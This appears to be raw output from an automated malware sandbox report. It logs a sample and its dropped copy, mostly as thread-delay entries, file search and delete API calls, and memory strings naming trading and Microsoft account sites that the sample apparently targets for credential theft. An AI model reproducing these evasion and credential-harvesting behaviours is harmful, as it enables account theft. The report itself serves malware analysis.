                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597172Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597063Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596938Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596594Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595074Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594966Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594857Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597739Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2463Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7350Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7949Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1873Jump to behavior
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeAPI coverage: 3.8 %
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeAPI coverage: 3.9 %
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B0DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00B0DBBE
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00ADC2A2 FindFirstFileExW,0_2_00ADC2A2
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B168EE FindFirstFileW,FindClose,0_2_00B168EE
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B1698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00B1698F
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B0D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B0D076
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B0D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B0D3A9
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B19642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B19642
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B1979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B1979D
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B19B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00B19B2B
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B15C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00B15C97
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00FCDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,2_2_00FCDBBE
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00F9C2A2 FindFirstFileExW,2_2_00F9C2A2
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00FD68EE FindFirstFileW,FindClose,2_2_00FD68EE
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00FD698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,2_2_00FD698F
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00FCD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00FCD076
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00FCD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00FCD3A9
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00FD9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00FD9642
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00FD979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00FD979D
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00FD9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00FD9B2B
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00FD5C97 FindFirstFileW,FindNextFileW,FindClose,2_2_00FD5C97
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00AA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AA42DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599655Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599438Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598121Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597942Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597634Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597528Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597416Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597297Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597172Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597063Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596938Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596594Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595074Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594966Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594857Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597739Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
                Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
